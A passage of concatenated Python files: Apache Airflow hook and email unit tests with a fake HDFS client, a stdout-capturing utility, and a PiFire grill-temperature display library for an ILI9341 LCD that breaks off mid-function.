:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
outputgrabber.py
|
import os
import sys
import threading
import time
# Credits to craymichael
# https://stackoverflow.com/questions/24277488/in-python-how-to-capture-the-stdout-from-a-c-shared-library-to-a-variable # noqa
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
# wait until the thread finishes so we are sure that
# we have until the last character:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out, 1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
|
display_ili9341.py
|
#!/usr/bin/env python3
'''
*****************************************
PiFire Display Interface Library
*****************************************
Description:
This library supports using
the ILI9341 display with 240Hx320W resolution.
This module utilizes Luma.LCD to interface
this display.
*****************************************
'''
'''
Imported Libraries
'''
import time
import socket
import qrcode
import threading
from luma.core.interface.serial import spi
from luma.lcd.device import ili9341
from PIL import Image, ImageDraw, ImageFont
'''
Display class definition
'''
class Display:
def __init__(self, buttonslevel='HIGH', rotation=0, units='F'):
# Init Global Variables and Constants
self.rotation = rotation
self.units = units
self.displayactive = False
self.in_data = None
self.status_data = None
self.displaytimeout = None
self.displaycommand = 'splash'
# Init Display Device, Input Device, Assets
self._init_globals()
self._init_assets()
self._init_display_device()
def _init_globals(self):
# Init constants and variables
self.WIDTH = 320
self.HEIGHT = 240
self.inc_pulse_color = True
self.icon_color = 100
self.fan_rotation = 0
self.auger_step = 0
def _init_display_device(self):
# Init Device
self.serial = spi(port=0, device=0, gpio_DC=24, gpio_RST=25, bus_speed_hz=32000000, reset_hold_time=0.2, reset_release_time=0.2)
self.device = ili9341(self.serial, active_low=False, width=self.WIDTH, height=self.HEIGHT, gpio_LIGHT=5, rotate=self.rotation)
# Setup & Start Display Loop Thread
display_thread = threading.Thread(target=self._display_loop)
display_thread.start()
def _display_loop(self):
'''
Main display loop
'''
while True:
if self.displaytimeout:
if time.time() > self.displaytimeout:
self.displaycommand = 'clear'
if self.displaycommand == 'clear':
self.displayactive = False
self.displaytimeout = None
self.displaycommand = None
self._display_clear()
if self.displaycommand == 'splash':
self.displayactive = True
self._display_splash()
self.displaytimeout = time.time() + 3
self.displaycommand = None
time.sleep(3) # Hold splash screen for 3 seconds
if self.displaycommand == 'text':
self.displayactive = True
self._display_text()
self.displaycommand = None
self.displaytimeout = time.time() + 10
if self.displaycommand == 'network':
self.displayactive = True
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
networkip = s.getsockname()[0]
if (networkip != ''):
self._display_network(networkip)
self.displaytimeout = time.time() + 30
self.displaycommand = None
else:
self.display_text("No IP Found")
if self.displayactive:
if not self.displaytimeout:
if (self.in_data is not None) and (self.status_data is not None):
self._display_current(self.in_data, self.status_data)
time.sleep(0.1)
'''
============== Graphics / Display / Draw Methods =============
'''
def _init_assets(self):
self._init_background()
self._init_splash()
def _init_background(self):
self.background = Image.open('background.jpg')
self.background = self.background.resize((self.WIDTH, self.HEIGHT))
def _init_splash(self):
self.splash = Image.open('color-boot-splash.png')
(self.splash_width, self.splash_height) = self.splash.size
self.splash_width *= 2
self.splash_height *= 2
self.splash = self.splash.resize((self.splash_width, self.splash_height))
def _rounded_rectangle(self, draw, xy, rad, fill=None):
x0, y0, x1, y1 = xy
draw.rectangle([(x0, y0 + rad), (x1, y1 - rad)], fill=fill)
draw.rectangle([(x0 + rad, y0), (x1 - rad, y1)], fill=fill)
draw.pieslice([(x0, y0), (x0 + rad * 2, y0 + rad * 2)], 180, 270, fill=fill)
draw.pieslice([(x1 - rad * 2, y1 - rad * 2), (x1, y1)], 0, 90, fill=fill)
draw.pieslice([(x0, y1 - rad * 2), (x0 + rad * 2, y1)], 90, 180, fill=fill)
draw.pieslice([(x1 - rad * 2, y0), (x1, y0 + rad * 2)], 270, 360, fill=fill)
return (draw)
def _create_icon(self, charid, size, color):
# Get font and character size
font = ImageFont.truetype("FA-Free-Solid.otf", size)
# Create canvas
iconcanvas = Image.new('RGBa', font.getsize(charid))
# Create drawing object
draw = ImageDraw.Draw(iconcanvas)
draw.text((0, 0), charid, font=font, fill=color)
iconcanvas = iconcanvas.crop(iconcanvas.getbbox())
return(iconcanvas)
def _paste_icon(self, icon, canvas, position, rotation, bgcolor):
# First fill the background
bgfill = ImageDraw.Draw(canvas)
# Rotate the icon
icon = icon.rotate(rotation)
(icon_width, icon_height) = icon.size
#bgfill.rectangle([(position[0], position[1]), (position[0] + icon_width, position[1] + icon_height)], fill=bgcolor)
# Set the position & paste the icon onto the canvas
canvas.paste(icon, position, icon)
return(canvas)
def _draw_fan_icon(self, canvas):
# F = Fan (Upper Left)
icon_char = '\uf863'
icon_color = (0, self.icon_color, 255)
drawing = ImageDraw.Draw(canvas)
# Draw Rounded Rectangle Border
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 22, self.HEIGHT // 6 - 22, self.WIDTH // 8 + 22, self.HEIGHT // 6 + 22), 5,
icon_color)
# Fill Rectangle with Black
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 20, self.HEIGHT // 6 - 20, self.WIDTH // 8 + 20, self.HEIGHT // 6 + 20), 5,
(0, 0, 0))
# Create Icon Image
icon = self._create_icon(icon_char, 36, icon_color)
position = (self.WIDTH // 8 - 18, self.HEIGHT // 6 - 18)
canvas = self._paste_icon(icon, canvas, position, self.fan_rotation, (0,0,0))
return(canvas)
def _draw_auger_icon(self, canvas):
# A = Auger (Center Left)
icon_char = '\uf101'
icon_color_tuple = (0, self.icon_color, 0)
# Create a drawing object
drawing = ImageDraw.Draw(canvas)
# Draw Rounded Rectangle Border
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 22, self.HEIGHT // 2.5 - 22, self.WIDTH // 8 + 22, self.HEIGHT // 2.5 + 22), 5,
icon_color_tuple)
# Fill Rectangle with Black
drawing = self._rounded_rectangle(drawing, (
self.WIDTH // 8 - 20, self.HEIGHT // 2.5 - 20, self.WIDTH // 8 + 20, self.HEIGHT // 2.5 + 20), 5,
(0, 0, 0))
# Create Icon Image
icon = self._create_icon(icon_char, 36, icon_color_tuple)
(icon_width, icon_height) = icon.size
position = ((self.WIDTH // 8 - 18) + (icon_width // 8) + self.auger_step, (int(self.HEIGHT // 2.5) - 18) + (icon_height // 3))
canvas = self._paste_icon(icon, canvas, position, 0, (0,0,0))
return(canvas)
def _display_clear(self):
self.device.clear()
self.device.backlight(False)
self.device.hide()
def _display_canvas(self, canvas):
# Display Image
self.device.backlight(True)
self.device.show()
self.device.display(canvas)
def _display_splash(self):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Set the position & paste the splash image onto the canvas
position = ((self.WIDTH - self.splash_width) // 2, (self.HEIGHT - self.splash_height) // 2)
img.paste(self.splash, position)
self._display_canvas(img)
def _display_text(self):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Create drawing object
draw = ImageDraw.Draw(img)
font = ImageFont.truetype("impact.ttf", 42)
(font_width, font_height) = font.getsize(self.displaydata)
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT // 2 - font_height // 2), self.displaydata, font=font, fill=255)
self._display_canvas(img)
def _display_network(self, networkip):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(255, 255, 255))
img_qr = qrcode.make('http://' + networkip)
img_qr_width, img_qr_height = img_qr.size
img_qr_width *= 2
img_qr_height *= 2
w = min(self.WIDTH, self.HEIGHT)
new_image = img_qr.resize((w, w))
position = (int((self.WIDTH/2)-(w/2)), 0)
img.paste(new_image, position)
self._display_canvas(img)
def _display_current(self, in_data, status_data):
# Create canvas
img = Image.new('RGB', (self.WIDTH, self.HEIGHT), color=(0, 0, 0))
# Set the position and paste the background image onto the canvas
position = (0, 0)
img.paste(self.background, position)
# Create drawing object
draw = ImageDraw.Draw(img)
# Grill Temp Circle
draw.ellipse((80, 10, 240, 170), fill=(50, 50, 50)) # Grey Background Circle
if in_data['GrillTemp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['GrillTemp']) // 600) + 90
else:
endpoint = ((360 * in_data['GrillTemp']) // 300) + 90
draw.pieslice((80, 10, 240, 170), start=90, end=endpoint, fill=(200, 0, 0)) # Red Arc for Temperature
if (in_data['GrillSetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['GrillSetPoint']) // 600) + 90
else:
setpoint = ((360 * in_data['GrillSetPoint']) // 300) + 90
draw.pieslice((80, 10, 240, 170), start=setpoint - 2, end=setpoint + 2,
fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((90, 20, 230, 160), fill=(0, 0, 0)) # Black Circle for Center
# Grill Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Grill"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 20), text, font=font, fill=(255, 255, 255))
# Grill Set Point (Small Centered Top)
if (in_data['GrillSetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['GrillSetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 45 - font_height // 2), text, font=font,
fill=(0, 200, 255))
# Grill Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 80)
text = str(in_data['GrillTemp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 40), text, font=font, fill=(255, 255, 255))
else:
font = ImageFont.truetype("trebuc.ttf", 55)
text = str(in_data['GrillTemp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, 56), text, font=font, fill=(255, 255, 255))
# Draw Grill Temp Scale Label
text = "°" + self.units
font = ImageFont.truetype("trebuc.ttf", 24)
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH // 2 - font_width // 2, self.HEIGHT // 2 - font_height // 2 + 10), text, font=font,
fill=(255, 255, 255))
# PROBE1 Temp Circle
draw.ellipse((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), fill=(50, 50, 50))
if in_data['Probe1Temp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['Probe1Temp']) // 300) + 90
else:
endpoint = ((360 * in_data['Probe1Temp']) // 150) + 90
draw.pieslice((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), start=90, end=endpoint,
fill=(3, 161, 252))
if (in_data['Probe1SetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['Probe1SetPoint']) // 300) + 90
else:
setpoint = ((360 * in_data['Probe1SetPoint']) // 150) + 90
draw.pieslice((10, self.HEIGHT // 2 + 10, 110, self.HEIGHT // 2 + 110), start=setpoint - 2,
end=setpoint + 2, fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((20, self.HEIGHT // 2 + 20, 100, self.HEIGHT // 2 + 100), fill=(0, 0, 0))
# PROBE1 Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Probe-1"
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 40 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE1 Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 36)
else:
font = ImageFont.truetype("trebuc.ttf", 30)
text = str(in_data['Probe1Temp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 60 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE1 Set Point (Small Centered Bottom)
if (in_data['Probe1SetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['Probe1SetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((60 - font_width // 2, self.HEIGHT // 2 + 85 - font_height // 2), text, font=font,
fill=(0, 200, 255))
# PROBE2 Temp Circle
draw.ellipse((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110),
fill=(50, 50, 50))
if in_data['Probe2Temp'] < 0:
endpoint = 0
elif self.units == 'F':
endpoint = ((360 * in_data['Probe2Temp']) // 300) + 90
else:
endpoint = ((360 * in_data['Probe2Temp']) // 150) + 90
draw.pieslice((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110), start=90,
end=endpoint, fill=(3, 161, 252))
if (in_data['Probe2SetPoint'] > 0):
if self.units == 'F':
setpoint = ((360 * in_data['Probe2SetPoint']) // 300) + 90
else:
setpoint = ((360 * in_data['Probe2SetPoint']) // 150) + 90
draw.pieslice((self.WIDTH - 110, self.HEIGHT // 2 + 10, self.WIDTH - 10, self.HEIGHT // 2 + 110),
start=setpoint - 2, end=setpoint + 2, fill=(255, 255, 0)) # Yellow Arc for SetPoint
draw.ellipse((self.WIDTH - 100, self.HEIGHT // 2 + 20, self.WIDTH - 20, self.HEIGHT // 2 + 100),
fill=(0, 0, 0))
# PROBE2 Temp Label
font = ImageFont.truetype("trebuc.ttf", 16)
text = "Probe-2"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 40 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE2 Temperature (Large Centered)
if (self.units == 'F'):
font = ImageFont.truetype("trebuc.ttf", 36)
else:
font = ImageFont.truetype("trebuc.ttf", 30)
text = str(in_data['Probe2Temp'])[:5]
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 60 - font_height // 2), text, font=font,
fill=(255, 255, 255))
# PROBE2 Set Point (Small Centered Bottom)
if (in_data['Probe2SetPoint'] > 0):
font = ImageFont.truetype("trebuc.ttf", 16)
text = ">" + str(in_data['Probe2SetPoint'])[:5] + "<"
(font_width, font_height) = font.getsize(text)
draw.text((self.WIDTH - 60 - font_width // 2, self.HEIGHT // 2 + 85 - font_height // 2), text,
font=font, fill=(0, 200, 255))
# Active Outputs
''' Test of pulsing color '''
if self.inc_pulse_color == True:
if self.icon_color < 200:
self.icon_color += 20
else:
self.inc_pulse_color = False
self.icon_color -= 20
else:
if self.icon_color < 100:
self.inc_pulse_color = True
self.icon_color += 20
else:
self.icon_color -= 20
font = ImageFont.truetype("FA-Free-Solid.otf", 36)
if (status_data['outpins']['fan'] == 0):
# F = Fan (Upper Left), 40x40, origin 10,10
self._draw_fan_icon(img)
self.fan_rotation += 30
if self.fan_rotation >= 360:
self.fan_rotation = 0
if (status_data['outpins']['igniter'] == 0):
# I = Igniter(Center Right)
text = '\uf46a'
(font_width, font_height) = font.getsize(text)
draw = self._rounded_rectangle(draw, (
7 * (self.WIDTH // 8) - 22, self.HEIGHT // 2.5 - 22, 7 * (self.WIDTH // 8) + 22,
